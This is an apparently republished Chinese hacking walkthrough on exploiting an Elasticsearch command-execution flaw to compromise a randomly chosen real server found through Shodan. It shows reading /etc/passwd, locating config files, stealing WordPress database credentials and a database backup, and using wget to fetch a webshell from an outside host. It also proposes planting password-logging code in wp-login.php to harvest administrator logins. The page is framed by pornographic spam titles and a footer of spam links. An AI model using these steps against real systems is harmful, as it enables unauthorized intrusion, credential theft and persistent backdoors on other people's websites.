成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

通過ElasticSearch漏洞獲取某站webshell權限

原創
安全 漏洞
ElasticSearch在一些大型企業內部往往部署的比較多,因此在獲取某內網權限后,進一步的滲透就非常有意義了。在上一篇《ElasticSearch漏洞實戰:通過perl進行反彈shell》中分析了通過perl腳本來獲取反彈的shell,反彈的shell具有一定的時效性,本文就非perl方面的滲透進行探討。

ElasticSearch在一些大型企業內部往往部署的比較多,因此在獲取某內網權限后,進一步的滲透就非常有意義了。在上一篇《ElasticSearch漏洞實戰:通過perl進行反彈shell》中分析了通過perl腳本來獲取反彈的shell,反彈的shell具有一定的時效性,本文就非perl方面的滲透進行探討。

1.通過shodanhq搜索引擎搜索關鍵字“Elasticsearch”

首先在網站shodanhq.com注冊一個用戶,注冊成功后需要通過郵箱進行激活,激活后即可使用。在搜索框中輸入關鍵字“Elasticsearch”進行搜索,如圖1所示,結果以top countries顯示查詢記錄,在早期搜索結果中中國排名第一,后面以美國部署的服務器較多。在結果列表中隨機選擇一個IP地址,在本例中選擇的是國外的IP。

搜索關鍵詞“ElasticSearch”

圖1搜索關鍵詞“ElasticSearch”

2.通過FireFox便攜版本進行漏洞測試

在FireFox便攜版本輸入地址“http://192.121.xxx.xxx:9200/_search?pretty”,然后單擊“Load Url”,如圖2所示,在Post Data中輸入以下代碼:

通過FireFox便攜版本進行漏洞測試

該代碼的目的是讀取linux操作系統中的/etc/passwd文件的內容,如果存在漏洞則讀取passwd文件內容,反之則說明該漏洞不存在。

搜索關鍵詞“ElasticSearch”

圖2測試漏洞是否存在

3.查詢敏感文件

在Post data中修改exec(\"cat /etc/passwd\")內容為exec(\"locate *.php \")、exec(\"locate *.sql \")、exec(\"locate *.conf \")等以獲取敏感文件信息,如圖3所示,表明該服務器可能使用php,且cms系統可能為wordpress。

尋找系統敏感信息

圖3尋找系統敏感信息

使用代碼以下代碼直接獲取wp-config.php 文件所在路徑“/usr/share/nginx/xxxxxxxxxxxxx/wp-config.php”,如圖4所示:

獲取wp-config.php的路徑

圖4獲取wp-config.php的路徑

4.定位網站和真實路徑

通過執行“cat /usr/share/nginx/xxxxxxxxxxxxx/wp-config.php”來讀取該文件內容,如圖5所示,獲取mysql數據庫root賬號和密碼以及網站域名xxxxxxxxxxxxx.com

等信息。通過查看網站所在根目錄,還發現有mysql文件備份,通過flashget下載工具將其下載到本地,如圖6所示。

獲取網站域名等信息

圖5獲取網站域名等信息

下載數據庫文件

圖6下載數據庫文件#p#

5.獲取webshell

通過執行命令:wget -O /usr/share/nginx/xxxxxxa2/__MACOSX/oxxxxxxxa/ wp-content/uploads /my.php http://www.antian365.com/data/cache/2.txt 將webshell下載到本地服務器中/usr/share/nginx/xxxxxx2/__MACOSX/xxxxxxxxxxxxx/ wp-content/uploads目錄,webshell地址http://ocXXXXXx.com/wp-content/uploads/my.php,通過中國菜刀進行連接,如圖7所示成功獲取webshell權限。

獲取webshell權限

圖7獲取webshell權限

6.討論

在本例中通過命令執行漏洞下載了mysql數據庫文件,通過查看該文件知道了wordpress管理員的密碼等信息,如圖8所示,可以對該密碼進行破解,通過破解的密碼和用戶進行登錄,再通過后臺來提權,也可以輕松獲取webshell后門。

獲取wordpress后臺管理員密碼等信息

圖8獲取wordpress后臺管理員密碼等信息

還可以在wp-login.php文件中加入密碼記錄代碼,在if ( force_ssl_admin() && ! is_ssl() )代碼結束處加入記錄代碼,如圖9所示,加入后的代碼如下:

定期訪問http://www.antian365.com/wp-content/plugins/d.txt,即可獲取管理員登錄密碼等信息。

記錄wordpress密碼代碼

圖9記錄wordpress密碼代碼

注:本文僅供安全研究使用。

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2010-09-26 16:46:05

2011-04-19 09:47:14

2010-02-09 18:32:04

2013-07-11 09:51:15

2015-03-06 15:43:39

2010-09-13 15:40:56

2020-10-12 09:46:34

漏洞

2010-11-02 21:17:17

2013-08-29 15:24:36

2011-08-24 13:24:52

2015-03-06 15:31:01

2025-05-13 08:28:00

漏洞終端安全系統安全

2009-07-19 10:48:53

LinuxWebShell反彈CmdLine She

2010-09-13 17:17:04

2010-02-02 15:32:31

2021-01-27 17:24:27

密碼root權限漏洞

2023-07-17 08:21:52

漏洞版本項目

2009-12-04 19:29:33

2016-11-14 13:50:56

2022-02-16 11:51:16

McAfee漏洞Windows
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久久青草婷婷精品综合日韩 | 久久久妇女国产精品影视 | 99资源| 天天影视网天天综合色在线播放 | 老牛影视av一区二区在线观看 | 狠狠色狠狠色综合系列 | 少妇无套高潮一二三区 | 中文字幕高清免费日韩视频在线 | 色综合一区二区三区 | 国产精彩视频一区 | 天天操一操 | 中文字幕日韩欧美 | 成人福利在线观看 | 婷婷久久一区 | 午夜影院在线观看版 | av无遮挡| 久久久久久久久久一区 | 久久免费小视频 | 黄色福利 | 亚洲成人综合网站 | 免费一区在线观看 | 久99久视频 | 亚洲国产一区二区视频 | 91av视频在线播放 | 天天影视亚洲综合网 | 欧美一区二区三区在线观看 | 在线免费视频一区 | 精品一区二区久久久久久久网站 | 国产一区二区三区在线观看免费 | 欧美日韩一区在线 | 99久久久无码国产精品 | 久久久亚洲一区 | www.日本在线| 亚洲97 | 免费视频一区二区三区在线观看 | 中文字幕第7页 | 在线播放国产一区二区三区 | 国产精品久久久久一区二区三区 | 亚洲视频在线看 | 国产成人精品一区二三区在线观看 | 香蕉婷婷 |